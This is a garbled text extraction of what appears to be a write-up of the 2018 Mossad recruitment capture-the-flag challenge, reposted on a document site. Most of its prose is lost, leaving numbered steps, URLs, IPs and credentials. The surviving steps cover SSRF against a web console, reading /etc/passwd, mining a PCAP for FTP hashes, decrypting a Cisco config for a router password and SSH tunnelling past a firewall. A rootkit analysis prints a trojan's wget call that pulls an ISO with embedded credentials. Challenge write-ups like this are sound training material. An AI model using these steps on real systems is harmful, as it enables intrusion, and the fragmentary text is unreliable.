2018 Image result for mossad are you readycodesign.blog/wp-content/uploads/2018/04/msd181.pdf ·...

2018

2 31

2018

https://www.google.co.il/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwiY0t2N8M_aAhUIuhQKHUYYADYQjRx6BAgAEAU&url=https%3A%2F%2Fwww.breakingisraelnews.com%2F67634%2Fcrack-code-join-mossad%2F&psig=AOvVaw3x9-OQ3YCfcpWl0sk9BfGw&ust=1524554997563347

IP ............................................................ 4 | News Blog ...................................................................................................................... 6

1. ...................................................................................................... 6

2. ........................................................................................................... 6

3. ..................................................................................................... 6

PCAP................................................... 13

1. ................................................................................................... 13

2. ........................................................................................................ 13

3. .................................................................................................. 13

| rootkit ........................................................................................................................... 23 1. ................................................................................................... 23

2. ........................................................................................................ 23

3. .................................................................................................. 23

2018

| IP 1. 18.4.2018 20:00 - 0

https://www.r-u-ready.xyz/

2. Brainfuck .

2.1.

https://www.r-u-ready.xyz/https://www.r-u-ready.xyz/https://www.r-u-ready.xyz/

2.2. - xor-with-key. 3. XOR HEX Brainfuck 2.1

.

4. Israel-Is-70

String - HEX XOR .

5. IP 35.205.32.11

| News Blog http://35.205.32.11/

1. phishing.

2. 2.1. .

3. 3.1.

http://35.205.32.11/main

http://35.205.32.11/http://35.205.32.11/http://35.205.32.11/http://35.205.32.11/main

3.2. source code

3.3.

http://35.205.32.11/administration

3.4. ,

:

http://35.205.32.11/register

http://35.205.32.11/administrationhttp://35.205.32.11/register

3.5. SSRF.

3.5.1. client ,

web console - :

3.6. /etc/passwd

3.6.1.

3.7. login.php :

3.7.1.

3.7.2. login.php.

3.7.3.

3.8. loopback )127.0.0.1

3.8.1. console :

3.8.2.

2018

12 31

3.9. console :

3.9.1.

http://35.205.32.11/profilePics/administration

3.10. IP anonymous :

http://35.205.32.11/ch1_success

http://35.205.32.11/profilePics/administrationhttp://35.205.32.11/ch1_success

| PCAP

1. phishing

2. 2.1. PCAP

2.2. FTP

2.3.

2.4. storage

3. 3.1. wireshark FTP

35.204.90.89 2121

3.1.1. username : user , password: 12345

3.2. FTP

3.3. pcap FTP

5555 – HASH :

strings :

3.3.1. hash md5 - 37478

3.3.2. 37479 hash sha512 :

3.3.3. 5555:

3.3.4. hash 19922

3.4. FTP 5555 hash

1 hash sha512.

3.4.1. script

3.4.2. script FTP

3.5. FTP 2121 PCAP

3.5.1. Linux

FileZila

3.6. FTP 4

3.6.1. /usr/backup

Id_rsa Hint latest FW - floppyfw.conf.enc

3.6.2. backup cisco - cisco.conf.enc

3.7. hint s3cr3t - RSA

3.8. RSA SSH

shell /bin/false :

3.8.1. SFTP –

3.8.2. conf_enc.pyc -

FTP

2018

18 31

3.9. decompile pyc

3.9.1. :

3.10. script

3.10.1. google

https://gist.github.com/swinton/8409454

https://gist.github.com/swinton/8409454

3.10.2. Decrypt

3.11. FTP

3.11.1. cisco.conf - cisco

3.11.1.1. fwadmin

3.11.1.2. username : fwadmin password:

Sup3rS3cr#tP@ssword

3.11.1.3. router access-list

3.11.1.4. router

10.128.0.3 3389 8080

10.164.0.3 22

3.11.2. floppyfw.conf

3.11.2.1. FW 10.164.0.3 router

SSH (

3.11.2.2. FW

3.11.3.

3.11.3.1. storage 10.128.0.3

3.11.3.2. FW

10.164.0.3

3.11.3.3. storage 3389 8080

2018

21 31

3.12. 10.164.0.3

ssh tunneling FTP ssh tunnel FW tunnel

10.128.0.3 8080 .

3.12.1. backup SSH

3.12.2.

3.12.3. FW

3.12.4. router - Sup3rS3cr#tP@ssword

3.12.5. 8888

3.13. storage

http://35.205.32.11/ch1_success

2018

22 31

3.13.1. stolen_files/ mossad_2018_challenge.solution.doc

3.13.2.

http://localhost:8888/

2018

23 31

| rootkit

1.

2. 2.1.

2.2. ISO

2.3. JS

3. 3.1. zip busybox

3.2. file

3.2.1. ELF 64-

3.2.2. VM

2018

24 31

3.3. /tmp/

3.3.1. tmp

3.3.2. ls busybox

3.3.3.

3.3.3.1.

3.4. tmp

3.4.1. .readme tmp

3.5. suspicious network activity detected 3.5.1. .readme busybox

3.6. ps Process

2018

25 31

3.6.1. PID 1337 tmp/Tr0j linux

process

3.6.1.1. admin

3.6.2. /proc/1337 proc oply(

3.6.2.1. busybox

3.6.3. strings

3.6.3.1. wget

http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3

http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3

2018

26 31

3.6.3.2. ZIP ISO

3.7. mount

2018

27 31

3.7.1. ISO

)thumbs.db (vault

3.7.1.1.

3.7.2. file vault sqlight

3.7.3. 4 HTML 3 JS

3.7.3.1. Blowfish-CBC .

3.7.4. JS key

ISO thumb.db

3.7.4.1. thumb.db

3.7.4.2. KEY - *israel70*

3.8. http://sladex.org/blowfish.js/ decrypt 3 JS .

3.8.1. key.js

3.8.2. aes.js

http://sladex.org/blowfish.js/http://sladex.org/blowfish.js/http://sladex.org/blowfish.js/

3.8.3. script.js unpack (

3.8.4. HTML

3.9. 3 127.0.0.1( 1337

key 2

3.10. web python.

3.11. HTML

3.12. key - JSONdebug js

3.12.1. base64 decode –

!

3.13.

3.14.

http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4
http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4

Date post:	30-Jan-2021
Category:	Documents
Upload:	others
View:	0 times
Download:	0 times

2018 Image result for mossad are you readycodesign.blog/wp-content/uploads/2018/04/msd181.pdf ·...

Documents